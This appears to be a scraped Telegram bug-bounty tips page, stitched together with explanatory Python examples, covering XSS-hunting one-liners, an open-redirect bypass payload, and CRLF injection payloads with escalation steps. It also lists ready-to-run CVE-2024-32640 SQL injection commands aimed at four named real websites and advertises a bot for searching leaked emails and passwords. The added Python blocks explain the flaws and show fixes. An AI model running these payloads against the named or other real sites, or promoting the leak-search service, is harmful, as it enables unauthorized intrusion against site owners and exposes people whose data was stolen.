Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
#Threat_Research
1. TG8 Firewall - PreAuth RCE/Password Disclosure (PoC)
https://ssd-disclosure.com/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure
2. Cisco RV34X Series - Privilege Escalation in vpnTimer. Root Cause Analysis (PoC for CVE-2021-1520)
https://www.iot-inspector.com/blog/advisory-cisco-rv34x-series-privilege-escalation-vpntimer
Automate XSS using Dalfox, WaybackURL, GF Patterns.
Make sure you have Go installed on your Machine
To Install Go on your Machine:
1) sudo apt install -y golang
2) export GOROOT=/usr/lib/go
3) export GOPATH=$HOME/go
4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
5) source ~/.bashrc
How to Hunt Blind XSS using Dalfox?
Use waybackurls by tomnomnom to fetch URLs for a specific target.
Use GF patterns to find Possible XSS Vulnerable Parameters.
Use Dalfox to find XSS.
Steps :
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
How to Hunt Reflected XSS?
Use waybackurls by tomnomnom to fetch URLs for a specific target.
Use qsreplace to accept URLs on stdin, replace all query string values with a user-supplied value, and output each combination of query string parameters only once per host and path.
Steps :
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while read -r host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo -e "$host \033[0;31mVulnerable\e[0m"; done
Find the parameters which are not filtering special characters - One Liner
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackurls.txt | egrep -iv "\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()' | tee combinedfuzz.json && cat combinedfuzz.json | while read -r host; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vulnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt
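The one-liner above flags a parameter when the exact bytes `"><()` come back in the response body, i.e. the application reflected the query-string value without HTML-encoding it. The following is an added example, not code from the channel post: it models a minimal search page two ways, a handler that interpolates the raw value (the bug the scan finds) and one that HTML-encodes it for the attribute context, and runs the same reflection decision the pipeline makes against both. The URL, the page template and the handler names are constructed for illustration.

```python
"""Added example: what the '"><()' probe detects, and the fix.

Constructed for illustration; not the channel's or any project's code.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

PROBE = '"><()'  # marker used by the one-liner; harmless on its own

# Constructed page fragment: the value lands inside a quoted attribute.
TEMPLATE = '<input type="text" name="search" value="{value}">'


def _search_value(url: str) -> str:
    """Extract ?search= the way a web framework would (percent-decoded)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("search", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the value verbatim: '"' closes the attribute, '>' closes the tag."""
    return TEMPLATE.format(value=_search_value(url))


def render_hardened(url: str) -> str:
    """Encodes for the HTML attribute context before reflecting."""
    # quote=True escapes " and ' in addition to < > &, so the value can
    # neither close the attribute nor open a new tag.
    return TEMPLATE.format(value=html.escape(_search_value(url), quote=True))


def reflects_probe(body: str) -> bool:
    """Same test as `grep -qs '\"><()'` in the one-liner."""
    return PROBE in body


def classify(render) -> str:
    """Send the probe to a handler and report like the one-liner does."""
    url = "https://app.example/search?search=" + quote(PROBE, safe="")
    return "Vulnerable" if reflects_probe(render(url)) else "Not Vulnerable"


if __name__ == "__main__":
    for name, handler in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name:11s} -> {classify(handler)}")
        print("   body:", handler("https://app.example/search?search=%22%3E%3C%28%29"))
```

The hardened handler only fixes the attribute context shown here; a value reflected inside a `<script>` block or a URL needs the encoding for that context instead.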
#bugbountytips:
Always check whether there is a captcha on your target, then try to understand how the captcha works and try to bypass it; you never know, maybe you'll get it 😉
#Note:
Many programs don't accept this kind of vulnerability, so you must search only in authentication endpoints.
When you are looking for bugs like SSRF and open redirect and there is a blacklisted character, try to bypass it using other Unicode characters.
I found an open redirect bypass using the (。) Chinese dot, "%E3%80%82".
poc:
redirect_to=////evil%E3%80%82com
#BugBounty #bugbountytip
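Why the PoC above works, and what a redirect check has to do to stop it, as an added example that is not part of the post: U+3002 (。, IDEOGRAPHIC FULL STOP) is mapped to "." by the IDNA/UTS-46 host processing browsers apply, so `evil。com` is the host `evil.com`, and a leading run of slashes is collapsed by browsers into a protocol-relative URL, so `////evil。com` goes to `https://evil.com/` even though `urllib` reports an empty netloc. The allowlisted host `app.example` and the function names are constructed for this example.

```python
"""Added example: naive vs hardened redirect-target validation.

Constructed for illustration; not the channel's or any project's code.
"""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"app.example"}  # constructed allowlist


def normalize_host(host: str) -> str:
    """IDNA-encode the host the way a browser does before comparing it.

    Python's idna codec splits labels on U+002E, U+3002, U+FF0E and U+FF61,
    which is exactly what turns 'evil。com' into 'evil.com'.
    """
    return host.encode("idna").decode("ascii").lower()


def naive_is_safe(target: str) -> bool:
    """Common but broken rule: 'no netloc, so it must be a local path'."""
    return urlsplit(target).netloc == ""


def hardened_is_safe(target: str) -> bool:
    """Accept a single-slash local path, or an absolute URL to an allowlisted host."""
    # Control characters and backslashes are parsed differently by every
    # client; refuse them outright rather than guess.
    if any(ord(c) < 0x20 for c in target) or "\\" in target:
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Must start with exactly one '/', otherwise a browser reads
        # '//host' (and '////host') as a protocol-relative URL.
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        return normalize_host(parts.hostname) in ALLOWED_HOSTS
    except UnicodeError:
        return False


def check_redirect_param(raw_value: str) -> tuple[bool, bool]:
    """Decode the query value as a framework would; return (naive, hardened)."""
    target = unquote(raw_value)
    return naive_is_safe(target), hardened_is_safe(target)


if __name__ == "__main__":
    for value in ("////evil%E3%80%82com", "/account?tab=1",
                  "https://app.example/account", "https://evil%E3%80%82com/"):
        naive, hardened = check_redirect_param(value)
        print(f"{value:32s} naive={naive!s:5s} hardened={hardened}")
```

The decisive difference is that the hardened check never infers "local" from what a Python parser failed to find; it requires the shape a browser will also read as local, and compares hosts only after the same normalization the browser performs.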
CRLF Tip:
Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.
Now escalate the impact:
1- ATO
If the web app is vulnerable to session fixation, simply set a new cookie using the CRLF and send it to the victim, then try to log in with the injected cookies.
2- Open redirect
Just add "Location:" header
3- XSS
- Add the "Location:" header with the value: "javascript: confirm(1)"
- Add the "Content-Length:" header; this makes the response body be read right after the response headers, then add your XSS payload.
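The payloads above end a path with `%0d%0a` because a server that copies the decoded request path (or a parameter) into a response header such as `Location` lets the CR LF terminate that header and start a new one. The following is an added example, not code from the post: it builds a raw HTTP/1.1 response head from a header list two ways, a builder that trusts its values and one that refuses CR, LF or NUL in any header name or value (the check modern HTTP libraries apply), then parses the result back as a client would so the extra header is visible. The redirect handler, host and cookie name are constructed.

```python
"""Added example: CRLF header injection, shown and then blocked.

Constructed for illustration; not the channel's or any project's code.
"""
from urllib.parse import unquote

FORBIDDEN = ("\r", "\n", "\0")


def build_head_vulnerable(status: str, headers: list[tuple[str, str]]) -> str:
    """Joins headers verbatim; a CRLF inside a value becomes a new header line."""
    lines = [f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers]
    return "\r\n".join(lines) + "\r\n\r\n"


def build_head_hardened(status: str, headers: list[tuple[str, str]]) -> str:
    """Same framing, but rejects CR, LF or NUL in a header name or value."""
    for k, v in headers:
        if any(ch in k or ch in v for ch in FORBIDDEN):
            raise ValueError(f"illegal character in header {k!r}")
    return build_head_vulnerable(status, headers)


def parse_head(head: str) -> dict[str, list[str]]:
    """Parse a response head into {lower-name: [values]} as a client would."""
    _status, _, rest = head.partition("\r\n")
    fields: dict[str, list[str]] = {}
    for line in rest.split("\r\n"):
        if not line:  # empty line ends the header section
            break
        name, _, value = line.partition(":")
        fields.setdefault(name.strip().lower(), []).append(value.strip())
    return fields


def redirect_headers_from_path(path: str) -> list[tuple[str, str]]:
    """Constructed handler that echoes the decoded request path into Location."""
    return [("Location", "https://app.example" + unquote(path)),
            ("Content-Type", "text/html")]


def injected_header_count(path: str, builder) -> int:
    """How many Set-Cookie headers a client sees for a response built by `builder`."""
    head = builder("302 Found", redirect_headers_from_path(path))
    return len(parse_head(head).get("set-cookie", []))


def hardened_rejects(path: str) -> bool:
    """True when the hardened builder refuses the headers derived from `path`."""
    try:
        build_head_hardened("302 Found", redirect_headers_from_path(path))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    clean = "/end/vuln/"
    crlf = "/end/vuln/%0d%0aSet-Cookie:%20sid=fixed"  # constructed probe
    print("vulnerable, clean path :", injected_header_count(clean, build_head_vulnerable))
    print("vulnerable, CRLF path  :", injected_header_count(crlf, build_head_vulnerable))
    print("hardened rejects CRLF  :", hardened_rejects(crlf))
```

The same split is what makes the `Location: javascript:...` and `Content-Length` tricks possible: once the attacker-controlled CR LF has ended the original header, everything after it is parsed as further headers and then as body. Rejecting the three bytes at the point where a value enters a header closes all of those variants at once.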
Test on these sites and thank me later; just give him a star :)
python3 CVE-2024-32640.py -u http://masa01.imve.com/ -g --dbs
python3 CVE-2024-32640.py -u https://www.kunstuitleenutrecht.nl -g --dbs
python3 CVE-2024-32640.py -u https://www.ryanwatts.me/ -g --dbs
python3 CVE-2024-32640.py -u http://www.pennydesigns.com/ -g --dbs
Automated SQLi Exploitation of Mura & Masa CMS via CVE-2024-32640
Thanks to my friend @StuartBeck11 for the amazing work! Give him a star ⭐
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
💧 At the moment, our bot is loaded with 2078 leaks.
✏️ In total they contain 52.536.415.358 records.
😲 This is more than any other telegram bot!
🔎 The following data is available for search:
📩Email: 23.841.454.924
👤Full name: 9.297.275.706
📞Telephone: 6.820.638.162
👤Nick: 4.576.677.061
🔑Password: 2.777.429.639
🃏Document Number: 1.487.310.933
🆔VK ID: 1.193.605.990
ⓕFacebookID: 824.900.847
🎯IP: 453.335.698
🔗Link: 301.684.979
🏢Company name: 297.019.478
🚘Vehicle number: 284.274.869
🌐Domain: 180.748.922
✈TelegramID: 154.968.917
📷Instagram ID: 45.089.233
Thread by @tabaahi_ on Thread Reader App – Thread Reader App
https://threadreaderapp.com/thread/1571386282835873792.html